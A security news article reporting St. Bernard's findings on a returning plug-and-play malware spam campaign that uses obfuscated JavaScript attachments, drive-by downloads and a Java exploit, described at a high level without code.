Aggressive plug-and-play malware campaign returns

In addition to hijacked email addresses, the spammers spoof major brands, such as Amazon, eBay, Facebook, and Word Press. St Bernard said it has blocked more than eight million PNP malware messages since the middle of last week.

"Like the global 'Here you have...' spam campaign from earlier this month, this new round of PNP spam is virulent and relies on social engineering to get users to click on a link or open an attachment, but that is where the similarities end. The PNP spam is much more sophisticated and more dangerous than the 'Here You Have...' campaign, which did not cause any harm to computers. From a single click on a link in the PNP email message, multiple exploits can silently infect a computer system in a matter of seconds," warned Mary Mizrahi, product manager at St. Bernard.

Those behind the PNP malware campaigns are changing their methods to bypass filters and convince users to click on links or open email attachments. They also appear to have switched from using their own obfuscation techniques for JavaScript that is sent through email to using commercially available tools like AntsSoft HTML Protector, which is designed to prevent certain actions on web pages such as right-clicking.

If a recipient opens the HTML attachment in the emails, the embedded JavaScript causes the browser to navigate to the compromised host, which then performs a drive-by-download (iFrame technique) of more JavaScript, according to St. Bernard. The additional script attempts several exploits and shuttles the browser to another fake anti-virus site, similar to the sites reported in August 2010.

The JavaScript obfuscation technique for the downloader component has been revamped and is attempting to exploit CVE-2010-0886, vulnerability in the Java Development Toolkit, as well as pulling down several other virulent components, including "installer_m.exe," "flash.swf" and "libtiff.pdf."

St. Bernard said that a Virus Total scan of the multiple malicious components contained in the downloader found that none of the virus engines had detected installer_m.exe, 12 had identified the flash.swf as a Trojan virus, and five had detected libtiff.pdf.

A posting on the St. Bernard Security Alerts blog noted:

One way or another, this technique has its roots extending back about a year now, so I think it’s safe to say that it is a relatively permanent feature of spam going forward, as I initially speculated earlier in the year. The one thing that could change its permanence is if browsers get very good at detecting/blocking this technique. Google’s Safe Browsing, for example, has made great strides in this realm compared to the beginning of the year.

What’s hot on Infosecurity Magazine?